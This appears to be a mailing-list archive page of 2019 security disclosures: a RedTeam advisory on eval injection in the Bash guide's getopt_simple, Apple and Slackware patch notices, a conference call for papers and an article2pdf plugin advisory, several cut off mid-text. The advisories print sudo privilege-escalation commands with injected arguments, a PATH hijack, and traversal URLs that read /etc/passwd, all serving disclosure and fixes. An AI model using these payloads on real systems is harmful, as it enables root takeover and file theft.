[RT-SA-2019-007] Code Execution via Insecure Shell Function getopt_simple

2019-03-26 Thread RedTeam Pentesting GmbH
Advisory: Code Execution via Insecure Shell Function getopt_simple

RedTeam Pentesting discovered that the shell function "getopt_simple",
as presented in the "Advanced Bash-Scripting Guide", allows execution of
attacker-controlled commands.


Details
=======

Product: Advanced Bash-Scripting Guide
Affected Versions: all
Fixed Versions: -
Vulnerability Type: Code Execution
Security Risk: medium
Vendor URL: https://www.tldp.org/LDP/abs/html/
Vendor Status: notified
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-007
Advisory Status: private
CVE: CVE-2019-9891
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9891


Introduction
============


The document "Advanced Bash-Scripting Guide" [1] is a tutorial for
writing shell scripts for Bash. It contains many example scripts
together with in-depth explanations about how shell scripting works.


More Details
============


During a penetration test, RedTeam Pentesting was able to execute
commands as an unprivileged user (www-data) on a server. Among others,
it was discovered that this user was permitted to run the shell script
"cleanup.sh" as root via "sudo":


$ sudo -l
Matching Defaults entries for user on srv:
env_reset, secure_path=/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on srv:
(root) NOPASSWD: /usr/local/sbin/cleanup.sh


The script "cleanup.sh" starts with the following code:


#!/bin/bash

getopt_simple()
{
    until [ -z "$1" ]
    do
      if [ ${1:0:2} = '--' ]
      then
          tmp=${1:2}               # Strip off leading '--' . . .
          parameter=${tmp%%=*}     # Extract name.
          value=${tmp##*=}         # Extract value.
          eval $parameter=$value
      fi
      shift
    done
}

target=/tmp

# Pass all options to getopt_simple().
getopt_simple $*

# list files to clean
echo "listing files in $target"
find "$target" -mtime 1


The function "getopt_simple" is used to set variables based on
command-line flags which are passed to the script. Calling the script
with the argument "--target=/tmp" sets the variable "$target" to the
value "/tmp". The variable's value is then used in a call to "find". The
source code of the "getopt_simple" function has been taken from the
"Advanced Bash-Scripting Guide" [2]. It was also published as a book.
RedTeam Pentesting identified two different ways to exploit this
function in order to run attacker-controlled commands as root.

First, a flag can be specified in which either the name or the value
contain a shell command. The call to "eval" will simply execute this
command.


$ sudo /usr/local/sbin/cleanup.sh '--redteam=foo;id'
uid=0(root) gid=0(root) groups=0(root)
listing files in /tmp

$ sudo /usr/local/sbin/cleanup.sh '--target=$(id)'
listing files in uid=0(root) gid=0(root) groups=0(root)
find: 'uid=0(root) gid=0(root) groups=0(root)': No such file or directory

$ sudo /usr/local/sbin/cleanup.sh '--target=$(ls${IFS}/)'
listing files in bin
boot
dev
etc
[...]


Instead of injecting shell commands, the script can also be exploited by
overwriting the "$PATH" variable. The "env_reset" and "secure_path"
settings shown in the "sudo -l" output only control the environment the
script starts with; the assignment performed by "eval" inside the script
replaces "$PATH" afterwards, so the unqualified call to "find" is then
resolved from a directory the attacker controls:


$ mkdir /tmp/redteam

$ cat > /tmp/redteam/find <<EOF
#!/bin/sh
echo "executed as root:"
/usr/bin/id
EOF

$ chmod +x /tmp/redteam/find

$ sudo /usr/local/sbin/cleanup.sh --PATH=/tmp/redteam
listing files in /tmp
executed as root:
uid=0(root) gid=0(root) groups=0(root)



Workaround
==========

No workaround available.


Fix
===

Replace the function "getopt_simple" with the built-in function
"getopts" or the program "getopt" from the util-linux package.
Examples on how to do so are included in the same tutorial [3][4]. In
either case the set of accepted option names is fixed in the script
rather than derived from the arguments, and option values are stored as
plain strings instead of being passed through "eval".
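As an added example (not code from the advisory or from the Advanced
Bash-Scripting Guide), the following replaces "getopt_simple" in the
"cleanup.sh" shown above with two parsers that never hand
attacker-controlled text to the shell: the "getopts" builtin the Fix
recommends, and a validating "--name=value" parser for scripts that must
keep the original calling convention. The option names "target" and
"days", the ALLOWED_OPTS list and the "cleanup_main" function are
assumptions made for this example.

```shell
#!/bin/sh
# Added example (not part of the advisory or of the ABS guide): two
# replacements for getopt_simple that keep attacker-controlled arguments
# away from the shell parser. The option names "target"/"days" and the
# ALLOWED_OPTS list are assumptions made for this example.

# Variant 1: the getopts builtin the advisory recommends. Short options
# only (-t DIR, -d DAYS); any other flag is an error, and OPTARG is stored
# as a plain string, so '$(id)' or 'foo;id' are never evaluated.
parse_opts_getopts() {
    OPTIND=1                      # reset so the function is re-entrant
    while getopts 't:d:' opt; do
        case $opt in
            t) target=$OPTARG ;;
            d) days=$OPTARG ;;
            *) return 1 ;;        # getopts already reported the bad flag
        esac
    done
    return 0
}

# Variant 2: keeps the --name=value convention of getopt_simple, but
#   * the name must be a shell identifier AND appear in ALLOWED_OPTS, so
#     --PATH=... and --redteam=foo;id are rejected instead of executed;
#   * the value reaches eval only as the escaped text "$value", so eval
#     sees nothing but a checked identifier and a variable reference.
ALLOWED_OPTS="target days"

is_allowed_opt() {
    local allowed
    for allowed in $ALLOWED_OPTS; do
        [ "$1" = "$allowed" ] && return 0
    done
    return 1
}

parse_opts_safe() {
    local arg name value
    for arg in "$@"; do
        case $arg in
            --*=*) ;;
            *) printf 'unknown argument: %s\n' "$arg" >&2; return 1 ;;
        esac
        name=${arg#--}
        value=${name#*=}          # everything after the FIRST '='
        name=${name%%=*}
        case $name in
            ''|[0-9]*|*[!A-Za-z0-9_]*)
                printf 'invalid option name: %s\n' "$name" >&2; return 1 ;;
        esac
        if ! is_allowed_opt "$name"; then
            printf 'option not permitted: %s\n' "$name" >&2; return 1
        fi
        eval "$name=\$value"      # expands to e.g. target=$value, nothing else
    done
    return 0
}

# Hardened body of cleanup.sh using variant 2. Note the quoted "$@":
# the original's unquoted $* re-splits arguments on whitespace.
cleanup_main() {
    target=/tmp
    days=1
    parse_opts_safe "$@" || return 1
    echo "listing files in $target"
    find "$target" -mtime "$days"
}
```

Both variants make the three calls from the advisory fail safe:
'--target=$(id)' is stored as the literal string $(id), and
'--redteam=foo;id' and '--PATH=/tmp/redteam' are rejected because
neither name is declared. The remaining "eval" in parse_opts_safe is
acceptable only because its left-hand side has been checked against an
identifier pattern and an allowlist and its right-hand side is the fixed
text \$value; adding the same name check in front of the guide's
"eval $parameter=$value" would still execute a value such as $(id),
because that value is expanded once before eval runs and again by eval.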


Security Risk
=============

If a script with attacker-controlled arguments uses the "getopt_simple"
function, arbitrary commands may be invoked by the attackers. This is
particularly interesting if a privilege boundary is crossed, for example
in the context of "sudo". Overall, this vulnerability is rated as a
medium risk.


Timeline
========


2019-02-18 Vulnerability identified
2019-03-20 Customer approved disclosure to vendor
2019-03-20 Author notified
2019-03-20 Author responded, document is not updated/maintained any more
2019-03-20 CVE ID requested
2019-03-21 CVE ID assigned
2019-03-26 Advisory released 


References
==========

[1] https://www.tldp.org/LDP/abs/html/
[2] https://www.tldp.org/LDP/abs/html/string-manipulation.html#GETOPTSIMPLE
[3] 

Recon 2019 Call For Papers - June 28 - 30, 2019 - Montreal, Canada

2019-03-26 Thread cfp
Recon Montreal - Call For Papers - June 28 - 30 - 2019
Welcome to TeleMate!
ATDT1514XXX
CONNECT 300
..
DATAPAC :

DATAPAC: Call connected to

This is a private system.  Access attempts are logged.  Unauthorized
access may result in prosecution.

Bienvenue!

[ASCII art: Montreal skyline, "R E C O N 2 0 1 9 - C F P"]

june 28 to 30, 2019
montreal, quebec

+ Hi - Flash back from 2008 ..

+ We are back

C F P

We are now inviting speakers to submit proposals for Recon Montreal 2019.

Some guidelines for talks are:

 - 30 or 60 minute presentations

 - We are open to proposals for workshops that would occur alongside
   talks

 - There will be time for five to ten minute informal lightning talks
   during the REcon party

Registration

Registration for the conference and training sessions is now open.
You can register at: https://tickets.recon.cx/reconmtl/2019/

Training

This year we have another great set of trainings available:
  

[slackware-security] mozilla-thunderbird (SSA:2019-084-01)

2019-03-26 Thread Slackware Security Team


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[slackware-security]  mozilla-thunderbird (SSA:2019-084-01)

New mozilla-thunderbird packages are available for Slackware 14.2 and -current
to fix security issues.


Here are the details from the Slackware 14.2 ChangeLog:
+--+
patches/packages/mozilla-thunderbird-60.6.1-i686-1_slack14.2.txz:  Upgraded.
  This release contains security fixes and improvements.
  For more information, see:
https://www.mozilla.org/en-US/thunderbird/60.6.1/releasenotes/
https://www.mozilla.org/security/known-vulnerabilities/thunderbird.html
  (* Security fix *)
+--+


Where to find the new packages:
+-+

Thanks to the friendly folks at the OSU Open Source Lab
(http://osuosl.org) for donating FTP and rsync hosting
to the Slackware project!  :-)

Also see the "Get Slack" section on http://slackware.com for
additional mirror sites near you.

Updated package for Slackware 14.2:
ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/mozilla-thunderbird-60.6.1-i686-1_slack14.2.txz

Updated package for Slackware x86_64 14.2:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/mozilla-thunderbird-60.6.1-x86_64-1_slack14.2.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-thunderbird-60.6.1-i686-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-thunderbird-60.6.1-x86_64-1.txz


MD5 signatures:
+-+

Slackware 14.2 package:
8819ba1c1bb0b82acedde947fe831567  
mozilla-thunderbird-60.6.1-i686-1_slack14.2.txz

Slackware x86_64 14.2 package:
b34e9acd3100d592e825c1c912b2  
mozilla-thunderbird-60.6.1-x86_64-1_slack14.2.txz

Slackware -current package:
6280813fd16a6563e12330ffd92ee5ff  xap/mozilla-thunderbird-60.6.1-i686-1.txz

Slackware x86_64 -current package:
97a9367a19d5eab63ba37e75302a9d78  xap/mozilla-thunderbird-60.6.1-x86_64-1.txz


Installation instructions:
++

Upgrade the package as root:
# upgradepkg mozilla-thunderbird-60.6.1-i686-1_slack14.2.txz


+-+

Slackware Linux Security Team
http://slackware.com/gpg-key
security@slackware.com

+------------------------------------------------------------------------+
| To leave the slackware-security mailing list:                          |
+------------------------------------------------------------------------+
| Send an email to majordomo@slackware.com with this text in the body of |
| the email message:                                                     |
|                                                                        |
|   unsubscribe slackware-security                                       |
|                                                                        |
| You will get a confirmation message back containing instructions to    |
| complete the process.  Please do not reply to this email address.      |
+------------------------------------------------------------------------+
-----BEGIN PGP SIGNATURE-----

iEYEARECAAYFAlyZWC0ACgkQakRjwEAQIjOQ+QCffkLund3ww9QStLuS1m0dmVb+
R80AniT1IrbUMXizVvdblllMK35L3Bep
=4Hxr
-----END PGP SIGNATURE-----


APPLE-SA-2019-3-25-1 iOS 12.2

2019-03-26 Thread Apple Product Security
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

APPLE-SA-2019-3-25-1 iOS 12.2

iOS 12.2 is now available and addresses the following:

CFString
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Processing a maliciously crafted string may lead to a denial
of service
Description: A validation issue was addressed with improved logic.
CVE-2019-8516: SWIPS Team of Frifee Inc.

configd
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to elevate privileges
Description: A memory initialization issue was addressed with
improved memory handling.
CVE-2019-8552: Mohamed Ghannam (@_simo36)

Contacts
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to elevate privileges
Description: A buffer overflow issue was addressed with improved
memory handling.
CVE-2019-8511: an anonymous researcher

CoreCrypto
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to elevate privileges
Description: A buffer overflow was addressed with improved bounds
checking.
CVE-2019-8542: an anonymous researcher

Exchange ActiveSync
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A user may authorize an enterprise administrator to remotely
wipe their device without appropriate disclosure
Description: This issue was addressed with improved transparency.
CVE-2019-8512: an anonymous researcher, an anonymous researcher

FaceTime
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A user's video may not be paused in a FaceTime call if they
exit the FaceTime app while the call is ringing
Description: An issue existed in the pausing of FaceTime video. The
issue was resolved with improved logic.
CVE-2019-8550: Lauren Guzniczak of Keystone Academy

Feedback Assistant
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to gain root privileges
Description: A race condition was addressed with additional
validation.
CVE-2019-8565: CodeColorist of Ant-Financial LightYear Labs

Feedback Assistant
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to overwrite arbitrary
files
Description: This issue was addressed with improved checks.
CVE-2019-8521: CodeColorist of Ant-Financial LightYear Labs

file
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Processing a maliciously crafted file might disclose user
information
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2019-6237: an anonymous researcher

GeoServices
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Clicking a malicious SMS link may lead to arbitrary code
execution
Description: A memory corruption issue was addressed with improved
validation.
CVE-2019-8553: an anonymous researcher

iAP
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to elevate privileges
Description: A buffer overflow was addressed with improved bounds
checking.
CVE-2019-8542: an anonymous researcher

IOHIDFamily
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A local user may be able to cause unexpected system
termination or read kernel memory
Description: A memory corruption issue was addressed with improved
state management.
CVE-2019-8545: Adam Donenfeld (@doadam) of the Zimperium zLabs Team

IOKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A local user may be able to read kernel memory
Description: A memory initialization issue was addressed with
improved memory handling.
CVE-2019-8504: an anonymous researcher

IOKit SCSI
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
input validation.
CVE-2019-8529: Juwei Lin (@panicaII) of Trend Micro

Kernel
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A remote attacker may be able to cause unexpected system
termination or corrupt kernel memory
Description: A buffer overflow was addressed with improved size
validation.
CVE-2019-8527: Ned Williamson of Google and derrek (@derrekr6)

Kernel
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to gain elevated privileges
Description: A logic issue was addressed with improved state
management.
CVE-2019-8514: Samuel Groß of Google 

APPLE-SA-2019-3-25-6 iCloud for Windows 7.11

2019-03-26 Thread Apple Product Security
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

APPLE-SA-2019-3-25-6 iCloud for Windows 7.11

iCloud for Windows 7.11 is now available and addresses the following:

CoreCrypto
Available for: Windows 7 and later
Impact: A malicious application may be able to elevate privileges
Description: A buffer overflow was addressed with improved bounds
checking.
CVE-2019-8542: an anonymous researcher

iTunes
Available for: Windows 7 and later
Impact: Running the iTunes installer in an untrusted directory may
result in arbitrary code execution
Description: A race condition existed during the installation of
iTunes for Windows. This was addressed with improved state handling.
CVE-2019-6232: Stefan Kanthak (eskamation.de)

WebKit
Available for: Windows 7 and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A type confusion issue was addressed with improved
memory handling.
CVE-2019-8506: Samuel Groß of Google Project Zero

WebKit
Available for: Windows 7 and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A memory corruption issue was addressed with improved
state management.
CVE-2019-8535: Zhiyang Zeng (@Wester) of Tencent Blade Team

WebKit
Available for: Windows 7 and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: Multiple memory corruption issues were addressed with
improved memory handling.
CVE-2019-6201: dwfault working with ADLab of Venustech
CVE-2019-8518: Samuel Groß of Google Project Zero
CVE-2019-8523: Apple
CVE-2019-8524: G. Geshev working with Trend Micro Zero Day Initiative
CVE-2019-8558: Samuel Groß of Google Project Zero
CVE-2019-8559: Apple
CVE-2019-8563: Apple

WebKit
Available for: Windows 7 and later
Impact: Processing maliciously crafted web content may disclose
sensitive user information
Description: A cross-origin issue existed with the fetch API. This
was addressed with improved input validation.
CVE-2019-8515: James Lee (@Windowsrcer)

WebKit
Available for: Windows 7 and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8536: Apple
CVE-2019-8544: an anonymous researcher

WebKit
Available for: Windows 7 and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A use after free issue was addressed with improved
memory management.
CVE-2019-7285: dwfault working at ADLab of Venustech
CVE-2019-8556: Apple

WebKit
Available for: Windows 7 and later
Impact: Processing maliciously crafted web content may result in the
disclosure of process memory
Description: A validation issue was addressed with improved logic.
CVE-2019-7292: Zhunki and Zhiyi Zhang of 360 ESG Codesafe Team

WebKit
Available for: Windows 7 and later
Impact: A malicious website may be able to execute scripts in the
context of another website
Description: A logic issue was addressed with improved validation.
CVE-2019-8503: Linus Särud of Detectify

WebKit
Available for: Windows 7 and later
Impact: Processing maliciously crafted web content may lead to
universal cross site scripting
Description: A logic issue was addressed with improved validation.
CVE-2019-8551: Ryan Pickren (ryanpickren.com)

Windows Installer
Available for: Windows 7 and later
Impact: Running the iCloud installer in an untrusted directory may
result in arbitrary code execution
Description: A race condition existed during the installation of
iCloud for Windows. This was addressed with improved state handling.
CVE-2019-6236: Stefan Kanthak (eskamation.de)

Additional recognition

Safari
We would like to acknowledge Nikhil Mittal (@c0d3G33k) of Payatu Labs
(payatu.com) for their assistance.

WebKit
We would like to acknowledge Andrey Kovalev of Yandex Security Team
for their assistance.

Installation note:

iCloud for Windows 7.11 may be obtained from:
https://support.apple.com/HT204283

Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222

This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----

[article2pdf (Wordpress plug-in)] Multiple vulnerabilities (CVE-2019-1000031, CVE-2019-1010257)

2019-03-26 Thread Christian Lerrahn

Product: article2pdf (Wordpress plug-in)
Product Website: https://wordpress.org/plugins/article2pdf/
Affected Versions: 0.24 and greater

The following vulnerabilities were found in a code review of the
plug-in. An attempt to contact the plug-in maintainer on 8 December 2018
was unsuccessful. The Wordpress security team disabled downloads of the
plug-in upon notification on 8 January 2019.

I would like to thank Ken Johnson (@cktricky) and Seth Law (@sethlaw)
whose course "Seth & Ken's Excellent Adventures in Secure Code Review"
sparked my interest in reviewing code for vulnerabilities.



[CVE-2019-1000031] Generated PDF file is only removed after download
which is initiated by a redirect
====================================================================

Type:
-----
Resource Exhaustion

Description:
------------
The plugin generates a PDF version of a post/article when a link of the
form

https://www.example.com/.../my-post-title/?article2pdf=1

is visited. The response to this initial request is a redirect to a link
like

http://www.example.com/wp-content/plugins/article2pdf/article2pdf_getfile.php?p=xxx&r=yyy&d=zzz

which will then return the PDF file contents and subsequently delete
the file.

As the deletion is coupled with the download but the download is
initiated by a different request than the one which creates the file,
visiting the link which creates the file and not following the redirect
results in the file not being deleted. These files can then accumulate
and potentially exhaust the available disk space.

Depending on the server setup, space exhaustion of a hard drive or hard
drive partition or even just a disk quota can result in denial of
service even for unrelated services on the same machine which rely on
the same resource.

This issue was originally reported on the plugin's bug tracker [2] but
never identified as a vulnerability.

Exploit
-------
Repeatedly visit a PDF generation link the plugin provides without ever
following the redirect to exhaust disk space.



[CVE-2019-1010257] PDF file download path is constructed from
insufficiently sanitised user input
=============================================================

Type:
-----
Information Disclosure / File Deletion

Description:
------------
When visiting the PDF download link which the original PDF generation
link redirects to, the file path is constructed from a combination of
fixed strings and the strings provided via the query string of the
download URL. The download URL has the form

http://www.example.com/wp-content/plugins/article2pdf/article2pdf_getfile.php?p=xxx&r=yyy&d=zzz

where xxx is a base64 encoded absolute string, yyy is a short hex hash
and zzz is the base64 encoded URL title slug of the post the PDF was
generated from. While the plugin attempts to sanitise these input
parameters to not allow path traversal, this sanitisation is
insufficient and can be fully or partially circumvented depending on
the PHP version the Wordpress instance is running on.

In the case of PHP version <5.3 it is possible to read any file the
user the plugin is executed under has read access to by just encoding
the full file path in the parameter "d" and terminating that string
with a null-byte. The parameter "p" must not be empty but can contain
any value. The parameter "r" may be empty but its value is of no
significance. If the user that the script is executed as has write
access to the file or the directory it is stored in, the file will be
deleted after it has been downloaded. If the user has no write access,
an error message may be shown at the end of the file contents
offered which discloses the Wordpress instance's install directory on
the server.

In the case of PHP version >=5.3, null-termination will no longer cut
off the string. As the generated file name ends with a fixed string
".pdf", only files with that file ending can be read. The parameter "d"
may be any directory on the server. The parameter "p" needs to contain
8 backspace characters to delete a prepended fixed string from the file
name while the parameter "r" must contain exactly one backspace. The
actual file name (without the ".pdf") can then be appended to the
backspaces in either parameter "p" or parameter "r". It is also
possible to have "p" contain one random character and then have 10
backspace characters followed by the actual file name (again,
without the ".pdf") stored in parameter "r".

The information above can also be found on the plug-in's issue tracker 
[3].


Exploit:
--------
On PHP <5.3, a specially crafted link like

http://php52.example.com/wp-content/plugins/article2pdf/article2pdf_getfile.php?p=YQ&r=&d=L2V0Yy9wYXNzd2QA

will download the server's /etc/passwd file.

On PHP >=5.3, a specially crafted link like

http://www.example.com/wp-content/plugins/article2pdf/article2pdf_getfile.php?p=CAgICAgICAg==&r=%08test&d=L3RtcA==

will return the contents of the file "/tmp/test.pdf" and 

APPLE-SA-2019-3-25-3 tvOS 12.2

2019-03-26 Thread Apple Product Security
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

APPLE-SA-2019-3-25-3 tvOS 12.2

tvOS 12.2 is now available and addresses the following:

CFString
Available for: Apple TV 4K and Apple TV (4th generation)
Impact: Processing a maliciously crafted string may lead to a denial
of service
Description: A validation issue was addressed with improved logic.
CVE-2019-8516: SWIPS Team of Frifee Inc.

configd
Available for: Apple TV 4K and Apple TV (4th generation)
Impact: A malicious application may be able to elevate privileges
Description: A memory initialization issue was addressed with
improved memory handling.
CVE-2019-8552: Mohamed Ghannam (@_simo36)

CoreCrypto
Available for: Apple TV 4K and Apple TV (4th generation)
Impact: A malicious application may be able to elevate privileges
Description: A buffer overflow was addressed with improved bounds
checking.
CVE-2019-8542: an anonymous researcher

file
Available for: Apple TV 4K and Apple TV (4th generation)
Impact: Processing a maliciously crafted file might disclose user
information
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2019-6237: an anonymous researcher

Foundation
Available for: Apple TV 4K and Apple TV (4th generation)
Impact: An application may be able to gain elevated privileges
Description: A memory corruption issue was addressed with improved
input validation.
CVE-2019-7286: an anonymous researcher, Clement Lecigne of Google
Threat Analysis Group, Ian Beer of Google Project Zero, and Samuel
Groß of Google Project Zero

GeoServices
Available for: Apple TV 4K and Apple TV (4th generation)
Impact: Clicking a malicious SMS link may lead to arbitrary code
execution
Description: A memory corruption issue was addressed with improved
validation.
CVE-2019-8553: an anonymous researcher

iAP
Available for: Apple TV 4K and Apple TV (4th generation)
Impact: A malicious application may be able to elevate privileges
Description: A buffer overflow was addressed with improved bounds
checking.
CVE-2019-8542: an anonymous researcher

IOHIDFamily
Available for: Apple TV 4K and Apple TV (4th generation)
Impact: A local user may be able to cause unexpected system
termination or read kernel memory
Description: A memory corruption issue was addressed with improved
state management.
CVE-2019-8545: Adam Donenfeld (@doadam) of the Zimperium zLabs Team

Kernel
Available for: Apple TV 4K and Apple TV (4th generation)
Impact: A remote attacker may be able to cause unexpected system
termination or corrupt kernel memory
Description: A buffer overflow was addressed with improved size
validation.
CVE-2019-8527: Ned Williamson of Google and derrek (@derrekr6)

Kernel
Available for: Apple TV 4K and Apple TV (4th generation)
Impact: A malicious application may be able to determine kernel
memory layout
Description: A memory initialization issue was addressed with
improved memory handling.
CVE-2019-8540: Weibo Wang (@ma1fan) of Qihoo 360 Nirvan Team

Kernel
Available for: Apple TV 4K and Apple TV (4th generation)
Impact: An application may be able to gain elevated privileges
Description: A logic issue was addressed with improved state
management.
CVE-2019-8514: Samuel Groß of Google Project Zero

Kernel
Available for: Apple TV 4K and Apple TV (4th generation)
Impact: A local user may be able to read kernel memory
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-7293: Ned Williamson of Google

Kernel
Available for: Apple TV 4K and Apple TV (4th generation)
Impact: A malicious application may be able to determine kernel
memory layout
Description: An out-of-bounds read issue existed that led to the
disclosure of kernel memory. This was addressed with improved input
validation.
CVE-2019-6207: Weibo Wang of Qihoo 360 Nirvan Team (@ma1fan)
CVE-2019-8510: Stefan Esser of Antid0te UG

Power Management
Available for: Apple TV 4K and Apple TV (4th generation)
Impact: A malicious application may be able to execute arbitrary code
with system privileges
Description: Multiple input validation issues existed in MIG
generated code. These issues were addressed with improved validation.
CVE-2019-8549: Mohamed Ghannam (@_simo36) of SSD Secure Disclosure
(ssd-disclosure.com)

Siri
Available for: Apple TV 4K and Apple TV (4th generation)
Impact: A malicious application may be able to initiate a Dictation
request without user authorization
Description: An API issue existed in the handling of dictation
requests. This issue was addressed with improved validation.
CVE-2019-8502: Luke Deshotels of North Carolina State University,
Jordan Beichler of North Carolina State University, William Enck of
North Carolina State University, Costin Carabaș of University
POLITEHNICA of Bucharest, and Răzvan Deaconescu of University
POLITEHNICA of Bucharest

TrueTypeScaler
Available for: Apple TV 4K and Apple TV (4th generation)
Impact: Processing a maliciously crafted font may result in the
disclosure of process memory
Description: An 

APPLE-SA-2019-3-25-5 iTunes 12.9.4 for Windows

2019-03-26 Thread Apple Product Security
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

APPLE-SA-2019-3-25-5 iTunes 12.9.4 for Windows

iTunes 12.9.4 for Windows is now available and addresses the
following:

CoreCrypto
Available for: Windows 7 and later
Impact: A malicious application may be able to elevate privileges
Description: A buffer overflow was addressed with improved bounds
checking.
CVE-2019-8542: an anonymous researcher

WebKit
Available for: Windows 7 and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A type confusion issue was addressed with improved
memory handling.
CVE-2019-8506: Samuel Groß of Google Project Zero

WebKit
Available for: Windows 7 and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A memory corruption issue was addressed with improved
state management.
CVE-2019-8535: Zhiyang Zeng (@Wester) of Tencent Blade Team

WebKit
Available for: Windows 7 and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: Multiple memory corruption issues were addressed with
improved memory handling.
CVE-2019-6201: dwfault working with ADLab of Venustech
CVE-2019-8518: Samuel Groß of Google Project Zero
CVE-2019-8523: Apple
CVE-2019-8524: G. Geshev working with Trend Micro Zero Day Initiative
CVE-2019-8558: Samuel Groß of Google Project Zero
CVE-2019-8559: Apple
CVE-2019-8563: Apple

WebKit
Available for: Windows 7 and later
Impact: Processing maliciously crafted web content may disclose
sensitive user information
Description: A cross-origin issue existed with the fetch API. This
was addressed with improved input validation.
CVE-2019-8515: James Lee (@Windowsrcer)

WebKit
Available for: Windows 7 and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8536: Apple
CVE-2019-8544: an anonymous researcher

WebKit
Available for: Windows 7 and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A use after free issue was addressed with improved
memory management.
CVE-2019-7285: dwfault working at ADLab of Venustech
CVE-2019-8556: Apple

WebKit
Available for: Windows 7 and later
Impact: A malicious website may be able to execute scripts in the
context of another website
Description: A logic issue was addressed with improved validation.
CVE-2019-8503: Linus Särud of Detectify

WebKit
Available for: Windows 7 and later
Impact: Processing maliciously crafted web content may result in the
disclosure of process memory
Description: A validation issue was addressed with improved logic.
CVE-2019-7292: Zhunki and Zhiyi Zhang of 360 ESG Codesafe Team

WebKit
Available for: Windows 7 and later
Impact: A sandboxed process may be able to circumvent sandbox
restrictions
Description: A memory corruption issue was addressed with improved
validation.
CVE-2019-8562: Wen Xu of SSLab at Georgia Tech and Hanqing Zhao of
Chaitin Security Research Lab

WebKit
Available for: Windows 7 and later
Impact: Processing maliciously crafted web content may lead to
universal cross site scripting
Description: A logic issue was addressed with improved validation.
CVE-2019-8551: Ryan Pickren (ryanpickren.com)

Additional recognition

Safari
We would like to acknowledge Nikhil Mittal (@c0d3G33k) of Payatu Labs
(payatu.com) for their assistance.

WebKit
We would like to acknowledge Andrey Kovalev of Yandex Security Team
for their assistance.

Installation note:

iTunes 12.9.4 for Windows may be obtained from:
https://www.apple.com/itunes/download/

Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222

This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/

APPLE-SA-2019-3-25-4 Safari 12.1

2019-03-26 Thread Apple Product Security

APPLE-SA-2019-3-25-4 Safari 12.1

Safari 12.1 is now available and addresses the following:

Safari Reader
Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, and
Mojave 10.14.4
Impact: Enabling the Safari Reader feature on a maliciously crafted
webpage may lead to universal cross site scripting
Description: A logic issue was addressed with improved validation.
CVE-2019-6204: Ryan Pickren (ryanpickren.com)
CVE-2019-8505: Ryan Pickren (ryanpickren.com)

WebKit
Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, and
Mojave 10.14.4
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A type confusion issue was addressed with improved
memory handling.
CVE-2019-8506: Samuel Groß of Google Project Zero

WebKit
Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, and
Mojave 10.14.4
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A memory corruption issue was addressed with improved
state management.
CVE-2019-8535: Zhiyang Zeng (@Wester) of Tencent Blade Team

WebKit
Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, and
Mojave 10.14.4
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
